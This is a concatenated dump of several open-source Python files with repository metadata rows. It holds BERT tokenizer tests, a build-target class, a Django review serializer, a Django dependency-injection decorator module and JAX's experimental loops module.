tokenizer.convert_tokens_to_ids(tokens), [7, 4, 5, 10, 8, 9])
def test_chinese(self):
tokenizer = tokenization.BasicTokenizer()
self.assertAllEqual(
tokenizer.tokenize(u"ah\u535A\u63A8zz"),
[u"ah", u"\u535A", u"\u63A8", u"zz"])
def test_basic_tokenizer_lower(self):
tokenizer = tokenization.BasicTokenizer(do_lower_case=True)
self.assertAllEqual(
tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "),
["hello", "!", "how", "are", "you", "?"])
self.assertAllEqual(tokenizer.tokenize(u"H\u00E9llo"), ["hello"])
def test_basic_tokenizer_no_lower(self):
tokenizer = tokenization.BasicTokenizer(do_lower_case=False)
self.assertAllEqual(
tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "),
["HeLLo", "!", "how", "Are", "yoU", "?"])
def test_basic_tokenizer_no_split_on_punc(self):
tokenizer = tokenization.BasicTokenizer(
do_lower_case=True, split_on_punc=False)
self.assertAllEqual(
tokenizer.tokenize(u" \tHeLLo!how \n Are yoU? "),
["hello!how", "are", "you?"])
def test_wordpiece_tokenizer(self):
vocab_tokens = [
"[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
"##ing", "##!", "!"
]
vocab = {}
for (i, token) in enumerate(vocab_tokens):
vocab[token] = i
tokenizer = tokenization.WordpieceTokenizer(vocab=vocab)
self.assertAllEqual(tokenizer.tokenize(""), [])
self.assertAllEqual(
tokenizer.tokenize("unwanted running"),
["un", "##want", "##ed", "runn", "##ing"])
self.assertAllEqual(
tokenizer.tokenize("unwanted running !"),
["un", "##want", "##ed", "runn", "##ing", "!"])
self.assertAllEqual(
tokenizer.tokenize("unwanted running!"),
["un", "##want", "##ed", "runn", "##ing", "##!"])
self.assertAllEqual(
tokenizer.tokenize("unwantedX running"), ["[UNK]", "runn", "##ing"])
def test_convert_tokens_to_ids(self):
vocab_tokens = [
"[UNK]", "[CLS]", "[SEP]", "want", "##want", "##ed", "wa", "un", "runn",
"##ing"
]
vocab = {}
for (i, token) in enumerate(vocab_tokens):
vocab[token] = i
self.assertAllEqual(
tokenization.convert_tokens_to_ids(
vocab, ["un", "##want", "##ed", "runn", "##ing"]), [7, 4, 5, 8, 9])
def test_is_whitespace(self):
self.assertTrue(tokenization._is_whitespace(u" "))
self.assertTrue(tokenization._is_whitespace(u"\t"))
self.assertTrue(tokenization._is_whitespace(u"\r"))
self.assertTrue(tokenization._is_whitespace(u"\n"))
self.assertTrue(tokenization._is_whitespace(u"\u00A0"))
self.assertFalse(tokenization._is_whitespace(u"A"))
self.assertFalse(tokenization._is_whitespace(u"-"))
def test_is_control(self):
self.assertTrue(tokenization._is_control(u"\u0005"))
self.assertFalse(tokenization._is_control(u"A"))
self.assertFalse(tokenization._is_control(u" "))
self.assertFalse(tokenization._is_control(u"\t"))
self.assertFalse(tokenization._is_control(u"\r"))
self.assertFalse(tokenization._is_control(u"\U0001F4A9"))
def test_is_punctuation(self):
self.assertTrue(tokenization._is_punctuation(u"-"))
self.assertTrue(tokenization._is_punctuation(u"$"))
self.assertTrue(tokenization._is_punctuation(u"`"))
self.assertTrue(tokenization._is_punctuation(u"."))
self.assertFalse(tokenization._is_punctuation(u"A"))
self.assertFalse(tokenization._is_punctuation(u" "))
if __name__ == "__main__":
tf.test.main()
| 33.57764
| 80
| 0.642249
|
4a0504385eab48722f836062cf1488feb079777d
| 3,729
|
py
|
Python
|
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | 1
|
2015-07-22T15:27:40.000Z
|
2015-07-22T15:27:40.000Z
|
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | null | null | null |
ligament/buildtarget.py
|
Archived-Object/ligament
|
ff3d78130522676a20dc64086dc8a27b197cc20f
|
[
"Apache-2.0"
] | null | null | null |
from buildcontext import DeferredDependency
from helpers import pdebug, indent_text
class BuildTarget(object):
""" An action in ligament
BuildTargets exist within Build Contexts
(see ligament.buildcontext.Context)
Tasks extending buildtarget are expected to pass the keyword argument
data_dependencies up from their declaration.
"""
@property
def name(self):
return (self._name
if self._name is not None
else "<unnamed>")
@name.setter
def name(self, name):
self._name = name
def __init__(self,
data_dependencies={}):
self.data_dependencies = data_dependencies
""" A dict of names -> (DeferredDependencies or values).
when a build is requested, the DeferredDependencies are evaluated,
and the resulting dict is passed as kwargs to self.build()
for example
SomeBuildTarget(
data_dependencies={
"foo": DeferredDependency("bar"),
"baz": DeferredDependency("quod"),
"bul": 4
})
will mean that `SomeBuildTarget.build` is called with kwargs
SomeBuildTarget.build(
foo=<value of bar>,
baz=<value of quod>,
bul=4)
"""
self._name = None
""" The name of this task in its registered build context """
self.context = None
""" The build context this target is registered with """
self.file_watch_targets = []
""" The list of files this build target wants to be notified of """
def register_with_context(self, myname, context):
""" registers this build target (exclusively) with a given context """
if self.context is not None:
raise Exception("attempted to register BuildTarget with multiple "
"BuildContexts")
context.register_task(myname, self)
self._name = myname
self.context = context
for key in self.data_dependencies:
if type(self.data_dependencies[key]) is DeferredDependency:
self.data_dependencies[key].parent = myname
self.data_dependencies[key].context = context
for tnmame in self.data_dependencies[key].target_names:
context.register_dependency(tnmame, myname)
def resolve_dependencies(self):
""" evaluate each of the data dependencies of this build target,
returns the resulting dict"""
return dict(
[((key, self.data_dependencies[key])
if type(self.data_dependencies[key]) != DeferredDependency
else (key, self.data_dependencies[key].resolve()))
for key in self.data_dependencies])
def resolve_and_build(self):
""" resolves the dependencies of this build target and builds it """
pdebug("resolving and building task '%s'" % self.name,
groups=["build_task"])
indent_text(indent="++2")
toret = self.build(**self.resolve_dependencies())
indent_text(indent="--2")
return toret
def build(self):
""" (abstract) perform some task and return the result.
Also assigns the value f self.file_watch_targets """
raise Exception("build not implemented for %s" % type(self))
pass
def update_build(self, changedfiles):
""" (abstract) updates the task given a list of changed files """
raise Exception("update_build not implemented for %s" % type(self))
pass
| 35.855769
| 78
| 0.590507
|
4a05059e0ca2833b3a0b7c13b5bcb9c1b74be015
| 2,157
|
py
|
Python
|
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | null | null | null |
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | 93
|
2020-05-19T18:14:12.000Z
|
2022-03-29T00:26:39.000Z
|
django/apps/review/serializers.py
|
wykys/project-thesaurus
|
f700396b30ed44e6b001c15397a25450ac068af4
|
[
"MIT"
] | 1
|
2020-11-21T20:24:35.000Z
|
2020-11-21T20:24:35.000Z
|
from django.utils.translation import gettext_lazy as _
from rest_framework.exceptions import ValidationError
from rest_framework.fields import DateTimeField, CurrentUserDefault, HiddenField
from rest_framework.relations import PrimaryKeyRelatedField, HyperlinkedIdentityField
from rest_framework.serializers import ModelSerializer
from apps.accounts.serializers import UserSerializer
from apps.review.models import Review
from apps.thesis.models import Thesis
class ReviewPublicSerializer(ModelSerializer):
thesis = PrimaryKeyRelatedField(
queryset=Thesis.objects.get_queryset(),
style=dict(base_template='input.html'),
)
user = UserSerializer(read_only=True)
user_id = HiddenField(default=CurrentUserDefault(), source='user', write_only=True)
url = HyperlinkedIdentityField(view_name='api:review-pdf-detail')
created = DateTimeField(read_only=True, format=None)
class Meta:
model = Review
fields = (
'id',
'url',
'thesis',
'user',
'user_id',
'difficulty',
'grades',
'grade_proposal',
'created',
)
def validate(self, attrs):
thesis = attrs.get('thesis')
user = self.context.get('request').user if not self.instance else self.instance.user
if not (
thesis.state == Thesis.State.READY_FOR_REVIEW and
user in (thesis.supervisor, thesis.opponent) and
not Review.objects.filter(
thesis=thesis,
user=user
).exclude(
id=self.instance.id if self.instance else None
).exists()
):
raise ValidationError(_('Review has been already posted by this user or this user is not allowed to post '
'review for this thesis.'))
return attrs
class ReviewFullInternalSerializer(ReviewPublicSerializer):
class Meta(ReviewPublicSerializer.Meta):
fields = ReviewPublicSerializer.Meta.fields + (
'comment',
'questions',
)
| 33.703125
| 118
| 0.632823
|
4a050648c0f9f883708317d807464d4d2e5d105c
| 9,217
|
py
|
Python
|
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
django_autowired/autowired.py
|
yangyuecho/django-autowired
|
fbbd2e706813eff25916b308156a5f771bc44b51
|
[
"MIT"
] | null | null | null |
import functools
import json
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Type
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.http.response import JsonResponse
from django.views import View
from django_autowired import params
from django_autowired.dependency.models import Dependant
from django_autowired.dependency.utils import DependantUtils
from django_autowired.exceptions import APIException
from django_autowired.exceptions import RequestValidationError
from django_autowired.typing import BodyType
from django_autowired.utils import BodyConverter
from pydantic import BaseModel
from pydantic import ValidationError
from pydantic.error_wrappers import ErrorWrapper
from pydantic.fields import ModelField
ViewFunc = Callable
def _prepare_response_content(
content: Any,
*,
exclude_unset: bool = False,
exclude_defaults: bool = False,
exclude_none: bool = False,
) -> Any:
if isinstance(content, BaseModel):
return content.dict(
by_alias=True,
exclude_unset=exclude_unset,
exclude_defaults=exclude_defaults,
exclude_none=exclude_none,
)
elif isinstance(content, list):
return [
_prepare_response_content(
item,
exclude_unset=exclude_unset,
exclude_defaults=exclude_defaults,
exclude_none=exclude_none,
)
for item in content
]
elif isinstance(content, dict):
return {
k: _prepare_response_content(
v,
exclude_unset=exclude_unset,
exclude_defaults=exclude_defaults,
exclude_none=exclude_none,
)
for k, v in content.items()
}
return content
def serialize_response(
*,
response_content: Any,
field: Optional[ModelField] = None,
include: Optional[Set[str]] = None,
exclude: Optional[Set[str]] = None,
by_alias: bool = True,
) -> Any:
if field:
errors = []
response_content = _prepare_response_content(
content=response_content,
)
value, errors_ = field.validate(response_content, {}, loc=("response",))
if isinstance(errors_, ErrorWrapper):
errors.append(errors_)
elif isinstance(errors_, list):
errors.extend(errors_)
if errors:
raise ValidationError(errors, field.type_)
result = value.dict(by_alias=by_alias, include=include, exclude=exclude)
if "__root__" in result:
result = result["__root__"]
return result
else:
return response_content
class ViewRoute(object):
def __init__(
self,
view_func: ViewFunc,
status_code: int = 200,
dependencies: Optional[List[params.Depends]] = None,
response_model: Optional[Type[Any]] = None,
response_class: Optional[Type[HttpResponse]] = None,
response_model_include: Optional[Set[str]] = None,
response_model_exclude: Optional[Set[str]] = None,
response_model_by_alias: bool = True,
) -> None:
self._view_func = view_func
self._dependencies = dependencies or []
self._dependant = Dependant.new_dependant(call=view_func, is_view_func=True)
for depends in self._dependencies[::-1]:
self._dependant.dependencies.insert(
0,
self._dependant.new_paramless_sub_dependant(depends=depends),
)
self._unique_id = str(view_func)
self._body_field = self._dependant.get_body_field(name=self._unique_id)
self._is_body_form = bool(
self._body_field and isinstance(self._body_field.field_info, params.Form)
)
self._response_model = response_model
self._response_class = response_class or JsonResponse
if self._response_model:
response_name = "Response_" + self._unique_id
self._response_field = DependantUtils.create_model_field(
name=response_name, type_=self._response_model
)
self._cloned_response_field = DependantUtils.create_cloned_field(
field=self._response_field,
)
else:
self._response_field = None
self._cloned_response_field = None
self._status_code = status_code
@property
def dependant(self) -> Dependant:
return self._dependant
@property
def is_body_form(self) -> bool:
return self._is_body_form
@property
def body_field(self) -> Optional[ModelField]:
return self._body_field
@property
def response_field(self) -> Optional[ModelField]:
return self._cloned_response_field
@property
def status_code(self) -> int:
return self._status_code
class Autowired(object):
def __init__(self) -> None:
# TODO
self._view_route: Dict[ViewFunc, ViewRoute] = {}
def __call__(
self,
description: Optional[str] = None,
dependencies: Optional[List[params.Depends]] = None,
status_code: int = 200,
response_model: Optional[Type[Any]] = None,
response_class: Type[HttpResponse] = JsonResponse,
response_model_include: Optional[Set[str]] = None,
response_model_exclude: Optional[Set[str]] = None,
response_model_by_alias: bool = True,
) -> ViewFunc:
def decorator(func: ViewFunc) -> ViewFunc:
# TODO
route = ViewRoute(
view_func=func,
dependencies=dependencies,
status_code=status_code,
response_model=response_model,
response_class=response_class,
response_model_include=response_model_include,
response_model_exclude=response_model_exclude,
response_model_by_alias=response_model_by_alias,
)
self._view_route[func] = route
body_field = route.body_field
is_body_form = route.is_body_form
def inner(*args, **kwargs) -> Any:
"""
When called, the method will identify and inject the dependency
"""
dependant = self._view_route[func].dependant
view_func = func
if dependant.ismethod:
# class-base view
view_self = args[0]
view_func = functools.partial(func, view_self)
view_request: HttpRequest = args[1]
# view_args = args[2:]
else:
# function view
view_request = args[0]
# view_args = args[1:]
# slove dependency
try:
body: Optional[BodyType] = None
if body_field:
if is_body_form:
body = BodyConverter.to_form(request=view_request)
else:
body = BodyConverter.to_json(request=view_request)
except json.JSONDecodeError as e:
raise RequestValidationError(
[ErrorWrapper(exc=e, loc=("body", e.pos))], body=e.doc
)
except Exception:
raise APIException(detail="parse body error", status_code=422)
solved_result = dependant.solve_dependencies(
request=view_request,
body=body,
path_kwargs=kwargs,
is_body_form=is_body_form,
)
values, errors = solved_result
if errors:
# design after
raise RequestValidationError(errors=errors, body=body)
raw_response = view_func(**values)
if isinstance(raw_response, HttpResponse):
return raw_response
else:
response_data = serialize_response(
response_content=raw_response,
field=route.response_field,
include=response_model_include,
exclude=response_model_exclude,
by_alias=response_model_by_alias,
)
response = response_class(response_data, status=status_code)
return response
return inner
return decorator
autowired = Autowired()
class ClassView(View):
@autowired(description="this is post method")
def post(self, request, a: int, b: str, c):
print(self, request, a, b, c)
# @autowired(description="this is put method")
def put(self, request):
pass
@autowired(description="this is func view")
def func_view(request):
pass
if __name__ == "__main__":
v = ClassView()
v.post(1, a=1, b="1", c="1")
| 33.035842
| 85
| 0.596289
|
4a0507eb00b9fb5d3b1f74e4a954275a678925f5
| 193
|
py
|
Python
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | 3
|
2021-08-18T17:50:31.000Z
|
2021-11-12T23:36:33.000Z
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | 4
|
2021-02-10T02:36:48.000Z
|
2022-03-02T14:55:34.000Z
|
data_collection/gazette/spiders/sc_guaramirim.py
|
Jefersonalves/diario-oficial
|
9a4bdfe2e31414c993d88831a67160c49a5ee657
|
[
"MIT"
] | null | null | null |
from gazette.spiders.base import FecamGazetteSpider
class ScGuaramirimSpider(FecamGazetteSpider):
name = "sc_guaramirim"
FECAM_QUERY = "cod_entidade:106"
TERRITORY_ID = "4206504"
| 24.125
| 51
| 0.772021
|
4a05082ab42281f21a8c09b0b0fda8296ec7f6c1
| 24,281
|
py
|
Python
|
jax/experimental/loops.py
|
iolloj/jax
|
1b80feea6acf758fd9dc3e616e8efcb8db831ce9
|
[
"Apache-2.0"
] | 17,375
|
2018-11-18T02:15:55.000Z
|
2022-03-31T23:49:46.000Z
|
jax/experimental/loops.py
|
iolloj/jax
|
1b80feea6acf758fd9dc3e616e8efcb8db831ce9
|
[
"Apache-2.0"
] | 5,018
|
2018-11-22T17:04:07.000Z
|
2022-03-31T23:36:25.000Z
|
jax/experimental/loops.py
|
abattery/jax
|
62c7744e68c66fae9faf9d8d00fea8aad4418cf3
|
[
"Apache-2.0"
] | 1,805
|
2018-11-21T10:13:53.000Z
|
2022-03-31T23:49:19.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loops is an **experimental** module for syntactic sugar for loops and control-flow.
The current implementation should convert loops correctly to JAX internal
representation, and most transformations should work (see below), but we have
not yet fine-tuned the performance of the resulting XLA compilation!
By default, loops and control-flow in JAX are executed and inlined during tracing.
For example, in the following code the `for` loop is unrolled during JAX tracing::
arr = np.zeros(5)
for i in range(arr.shape[0]):
arr[i] += 2.
if i % 2 == 0:
arr[i] += 1.
In order to capture the structured control-flow one can use the higher-order
JAX operations, which require you to express the body of the loops and
conditionals as functions, and the array updates using a functional style that
returns an updated array, e.g.::
arr = np.zeros(5)
def loop_body(i, acc_arr):
arr1 = acc_arr.at[i].set(acc_arr[i] + 2.)
return lax.cond(i % 2 == 0,
arr1,
lambda arr1: arr1.at[i].set(arr1[i] + 1),
arr1,
lambda arr1: arr1)
arr = lax.fori_loop(0, arr.shape[0], loop_body, arr)
This API quickly gets unreadable with deeper nested loops.
With the utilities in this module you can write loops and conditionals that
look closer to plain Python, as long as you keep the loop-carried state in a
special `loops.scope` object and use `for` loops over special
`scope.range` iterators::
from jax.experimental import loops
with loops.Scope() as s:
s.arr = np.zeros(5) # Create the mutable state of the loop as `scope` fields.
for i in s.range(s.arr.shape[0]):
s.arr = s.arr.at[i].set(s.arr[i] + 2.)
for _ in s.cond_range(i % 2 == 0): # Conditionals as loops with 0 or 1 iterations
s.arr = s.arr.at[i].set(s.arr[i] + 1.)
Loops constructed with `range` must have literal constant bounds. If you need
loops with dynamic bounds, you can use the more general `while_range` iterator.
However, in that case the `grad` transformation is not supported::
s.idx = start
for _ in s.while_range(lambda: s.idx < end):
s.idx += 1
Notes:
* Loops and conditionals to be functionalized can appear only inside scopes
constructed with `loops.Scope` and they must use one of the `Scope.range`
iterators. All other loops are unrolled during tracing, as usual in JAX.
* Only scope data (stored in fields of the scope object) is functionalized.
All other state, e.g., in other Python variables, will not be considered as
being part of the loop output. All references to the mutable state should be
through the scope, e.g., `s.arr`.
* The scope fields can be pytrees, and can themselves be mutable data structures.
* Conceptually, this model is still "functional" in the sense that a loop over
a `Scope.range` behaves as a function whose input and output is the scope data.
* Scopes should be passed down to callees that need to use loop
functionalization, or they may be nested.
* The programming model is that the loop body over a `scope.range` is traced
only once, using abstract shape values, similar to how JAX traces function
bodies.
Restrictions:
* The tracing of the loop body should not exit prematurely with `return`,
`exception`, `break`. This would be detected and reported as errors when we
encounter unnested scopes.
* The loop index variable should not be used after the loop. Similarly, one
should not use outside the loop data computed in the loop body, except data
stored in fields of the scope object.
* No new mutable state can be created inside a loop to be functionalized.
All mutable state must be created outside all loops and conditionals.
* Once the loop starts all updates to loop state must be with new values of the
same abstract values as the values on loop start.
* For a `while` loop, the conditional function is not allowed to modify the
scope state. This is a checked error. Also, for `while` loops, the `grad`
transformation does not work. An alternative that allows `grad` is a bounded
loop (`range`).
Transformations:
* All transformations are supported, except `grad` is not supported for
`Scope.while_range` loops.
* `vmap` is very useful for such loops because it pushes more work into the
inner-loops, which should help performance for accelerators.
For usage example, see tests/loops_test.py.
"""
from functools import partial
import itertools
import numpy as np
import traceback
from typing import Any, Dict, List, cast
from jax import lax, core
from jax._src.lax import control_flow as lax_control_flow
from jax import tree_util
from jax import numpy as jnp
from jax.errors import UnexpectedTracerError
from jax.interpreters import partial_eval as pe
from jax._src.util import safe_map
class Scope(object):
"""A scope context manager to keep the state of loop bodies for functionalization.
Usage::
with Scope() as s:
s.data = 0.
for i in s.range(5):
s.data += 1.
return s.data
"""
def __init__(self):
# state to be functionalized, indexed by names, can be pytrees
self._mutable_state: Dict[str, Any] = {}
# the pytrees of abstract values; set when the loop starts.
self._mutable_state_aval: Dict[str, core.AbstractValue] = {}
self._active_ranges = [] # stack of active ranges, last one is the innermost.
self._count_subtraces = 0 # How many net started subtraces, for error recovery
def range(self, first, second=None, third=None):
"""Creates an iterator for bounded iterations to be functionalized.
The body is converted to a `lax.scan`, for which all JAX transformations work.
The `first`, `second`, and `third` arguments must be integer literals.
Usage::
range(5) # start=0, end=5, step=1
range(1, 5) # start=1, end=5, step=1
range(1, 5, 2) # start=1, end=5, step=2
s.out = 1.
for i in scope.range(5):
s.out += 1.
"""
if third is not None:
start = int(first)
stop = int(second)
step = int(third)
else:
step = 1
if second is not None:
start = int(first)
stop = int(second)
else:
start = 0
stop = int(first)
return _BodyTracer(self, _BoundedLoopBuilder(start, stop, step))
def cond_range(self, pred):
"""Creates a conditional iterator with 0 or 1 iterations based on the boolean.
The body is converted to a `lax.cond`. All JAX transformations work.
Usage::
for _ in scope.cond_range(s.field < 0.):
s.field = - s.field
"""
# TODO: share these checks with lax_control_flow.cond
if len(np.shape(pred)) != 0:
raise TypeError(
"Pred must be a scalar, got {} of shape {}.".format(pred, np.shape(pred)))
try:
pred_dtype = np.result_type(pred)
except TypeError as err:
msg = ("Pred type must be either boolean or number, got {}.")
raise TypeError(msg.format(pred)) from err
if pred_dtype.kind != 'b':
if pred_dtype.kind in 'iuf':
pred = pred != 0
else:
msg = ("Pred type must be either boolean or number, got {}.")
raise TypeError(msg.format(pred_dtype))
return _BodyTracer(self, _CondBuilder(pred))
def while_range(self, cond_func):
"""Creates an iterator that continues as long as `cond_func` returns true.
The body is converted to a `lax.while_loop`.
The `grad` transformation does not work.
Usage::
for _ in scope.while_range(lambda: s.loss > 1.e-5):
s.loss = loss(...)
Args:
cond_func: a lambda with no arguments, the condition for the "while".
"""
return _BodyTracer(self, _WhileBuilder(cond_func))
def _push_range(self, range_):
for ar in self._active_ranges:
if ar is range_:
raise ValueError("Range is reused nested inside itself.")
self._active_ranges.append(range_)
def _pop_range(self, range_):
if not (range_ is self._active_ranges[-1]):
self._error_premature_exit_range()
self._active_ranges.pop()
def _error_premature_exit_range(self):
"""Raises error about premature exit from a range"""
msg = "Some ranges have exited prematurely. The innermost such range is at\n{}"
raise ValueError(msg.format(self._active_ranges[-1].location()))
def __getattr__(self, key):
"""Accessor for scope data.
Called only if the attribute is not found, which will happen when we read
scope data that has been stored in self._mutable_state.
"""
mt_val = self._mutable_state.get(key)
if mt_val is None:
raise AttributeError(
"Reading uninitialized data '{}' from the scope.".format(key))
return mt_val
def __setattr__(self, key, value):
"""Update scope data to be functionalized.
Called for *all* attribute setting.
"""
if key in ["_active_ranges", "_mutable_state", "_mutable_state_aval", "_count_subtraces"]:
object.__setattr__(self, key, value)
else:
if self._active_ranges:
if key not in self._mutable_state:
raise ValueError(
"New mutable state '{}' cannot be created inside a loop.".format(key))
assert key in self._mutable_state_aval
old_aval = self._mutable_state_aval[key]
flat_values, flat_tree = tree_util.tree_flatten(value)
new_aval = flat_tree.unflatten(safe_map(_BodyTracer.abstractify, flat_values))
if old_aval != new_aval:
msg = (f"Mutable state '{key}' is updated with new abstract value "
f"{new_aval}, which is different from previous one {old_aval}")
raise TypeError(msg)
self._mutable_state[key] = value
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
try:
if exc_type is None:
if self._active_ranges: # We have some ranges that we did not exit properly
self._error_premature_exit_range()
return True
else:
# The exception may come from inside one or more ranges. We let the current
# exception propagate, assuming it terminates the tracing. If not, the
# tracers may be left in an inconsistent state.
return False # re-raise
finally:
# Ensure we leave the global trace_state as we found it
while self._count_subtraces > 0:
self.end_subtrace()
def start_subtrace(self):
"""Starts a nested trace, returns the Trace object."""
# TODO: This follows the __enter__ part of core.new_main.
level = core.thread_local_state.trace_state.trace_stack.next_level()
main = core.MainTrace(level, pe.JaxprTrace)
core.thread_local_state.trace_state.trace_stack.push(main)
self._count_subtraces += 1
return pe.JaxprTrace(main, core.cur_sublevel())
def end_subtrace(self):
# TODO: This follows the __exit__ part of core.new_main
core.thread_local_state.trace_state.trace_stack.pop()
self._count_subtraces -= 1
class _BodyTracer(object):
"""Traces the body of the loop and builds a functional control-flow representation.
This class is also an iterator, only the first iteration is traced.
"""
def __init__(self, scope, loop_builder):
"""
Params:
scope: the current scope
loop_builder: instance of _LoopBuilder
"""
self.scope = scope
self.loop_builder = loop_builder
self.first_iteration = True # If we are tracing the first iteration
# Stack trace, without this line and the s.range function
self.stack = traceback.StackSummary.from_list(
cast(List[Any], traceback.extract_stack()[:-2]))
# Next are state kept from the start of the first iteration to the end of the iteration.
# List of scope fields carried through the loop
self.carried_state_names: List[str] = None
self.carried_state_initial = {} # Copy of the initial values of state, before loop starts
# The parameters that were created for state upon entering an arbitrary iteration.
self.carried_state_vars = {} # For each state, the list of Tracer variables introduced
# when starting to trace the loop body.
self.trace = None
def location(self):
"""A multiline string representing the source location of the range."""
if self.stack is not None:
return " ".join(self.stack.format())
else:
return ""
def __iter__(self):
"""Called before starting the first iteration."""
self.first_iteration = True # In case we reuse the range
return self
def __next__(self):
if self.first_iteration:
self.first_iteration = False
self.scope._push_range(self)
self.start_tracing_body()
return self._index_var
else:
self.end_tracing_body()
self.scope._pop_range(self)
raise StopIteration # Trace only one iteration.
def next(self): # For PY2
return self.__next__()
def start_tracing_body(self):
"""Called upon starting the tracing of the loop body."""
# TODO: This is the first part of partial_eval.trace_to_subjaxpr. Share.
self.trace = self.scope.start_subtrace()
# The entire state is carried.
self.carried_state_names = sorted(self.scope._mutable_state.keys())
for key in self.carried_state_names:
init_val = self.scope._mutable_state[key]
flat_init_vals, init_tree = tree_util.tree_flatten(init_val)
flat_init_avals = safe_map(_BodyTracer.abstractify, flat_init_vals)
flat_init_pvals = safe_map(pe.PartialVal.unknown, flat_init_avals)
flat_init_vars = safe_map(self.trace.new_arg, flat_init_pvals)
self.carried_state_vars[key] = flat_init_vars
# Set the scope._mutable_state to new tracing variables.
self.scope._mutable_state[key] = init_tree.unflatten(flat_init_vars)
self.scope._mutable_state_aval[key] = init_tree.unflatten(flat_init_avals)
# Make a copy of the initial state by unflattening the flat_init_vals
self.carried_state_initial[key] = init_tree.unflatten(flat_init_vals)
index_var_aval = _BodyTracer.abstractify(0)
index_var_pval = pe.PartialVal.unknown(index_var_aval)
self._index_var = self.trace.new_arg(index_var_pval)
def end_tracing_body(self):
"""Called when we are done tracing one iteration of the body."""
# We will turn the body of the loop into a function that takes some values
# for the scope state (carried_state_names) and returns the values for the
# same state fields after one execution of the body. For some of the ranges,
# e.g., scope.range, the function will also take the index_var as last parameter.
in_tracers = tuple(itertools.chain(*[self.carried_state_vars[ms] for ms in self.carried_state_names]))
if self.loop_builder.can_use_index_var():
in_tracers += (self._index_var,)
# Make the jaxpr for the body of the loop
# TODO: See which mutable state was changed in the one iteration.
# For now, we assume all state changes.
body_out_tracers = []
for key in self.carried_state_names:
new_val = self.scope._mutable_state[key]
flat_new_values, flat_new_tree = tree_util.tree_flatten(new_val)
body_out_tracers.extend(flat_new_values)
assert key in self.scope._mutable_state_aval
old_aval = self.scope._mutable_state_aval[key]
new_aval = flat_new_tree.unflatten(safe_map(_BodyTracer.abstractify, flat_new_values))
if old_aval != new_aval:
msg = (f"Mutable state '{key}' had at the end of the loop body new abstract value "
f"{new_aval}, which is different from initial one {old_aval}")
raise TypeError(msg)
try:
# If the body actually uses the index variable, and is not allowed to
# (e.g., cond_range and while_range), then in_tracers will not contain
# the tracer for the index_var, and trace_to_jaxpr_finalize will throw
# an assertion error.
body_closed_jaxpr, body_const_vals = _BodyTracer.trace_to_jaxpr_finalize(
in_tracers=in_tracers,
out_tracers=body_out_tracers,
trace=self.trace)
except UnexpectedTracerError as e:
if "Tracer not among input tracers" in str(e):
raise ValueError("Body of cond_range or while_range should not use the "
"index variable returned by iterator.") from e
raise
# End the subtrace for the loop body, before we trace the condition
self.scope.end_subtrace()
carried_init_val = tuple([self.carried_state_initial[ms]
for ms in self.carried_state_names])
carried_init_vals, carried_tree = tree_util.tree_flatten(carried_init_val)
assert len(carried_init_vals) == len(body_out_tracers)
carried_out_vals = self.loop_builder.build_output_vals(
self.scope, self.carried_state_names, carried_tree,
carried_init_vals, body_closed_jaxpr, body_const_vals)
carried_mutable_state_unflattened = tree_util.tree_unflatten(carried_tree,
carried_out_vals)
# Update the mutable state with the values of the changed vars, after the loop.
for ms, mv in zip(self.carried_state_names, carried_mutable_state_unflattened):
self.scope._mutable_state[ms] = mv
@staticmethod
def abstractify(x):
return core.raise_to_shaped(core.get_aval(x), weak_type=False)
@staticmethod
def trace_to_jaxpr_finalize(in_tracers, out_tracers, trace, instantiate=True):
# TODO: This is the final part of the partial_eval.trace_to_subjaxpr. Share.
instantiate = [instantiate] * len(out_tracers)
out_tracers = safe_map(trace.full_raise, safe_map(core.full_lower, out_tracers))
out_tracers = safe_map(partial(pe.instantiate_const_at, trace),
instantiate, out_tracers)
jaxpr, consts, env = pe.tracers_to_jaxpr(in_tracers, out_tracers)
assert not env # TODO: this is from partial_eval.trace_to_jaxpr. Share.
closed_jaxpr = core.ClosedJaxpr(pe.convert_constvars_jaxpr(jaxpr), ())
return closed_jaxpr, consts
class _LoopBuilder(object):
"""Abstract superclass for the loop builders"""
def can_use_index_var(self):
"""Whether this kind of loop can use the index var returned by the range iterator."""
raise NotImplementedError
def build_output_vals(self, scope, carried_state_names, carried_tree,
init_vals, body_closed_jaxpr, body_const_vals):
"""Builds the output values for the loop carried state.
Params:
scope: the current Scope object.
carried_state_names: the list of names of mutable state fields that is
carried through the body.
carried_tree: the PyTreeDef for the tuple of carried_state_names.
init_vals: the initial values on body entry corresponding to the init_tree.
body_closed_jaxpr: the Jaxpr for the body returning the new values of
carried_state_names.
body_const_vals: the constant values for the body.
Returns:
the output tracer corresponding to the lax primitive representing the loop.
"""
raise NotImplementedError
def __str__(self):
raise NotImplementedError
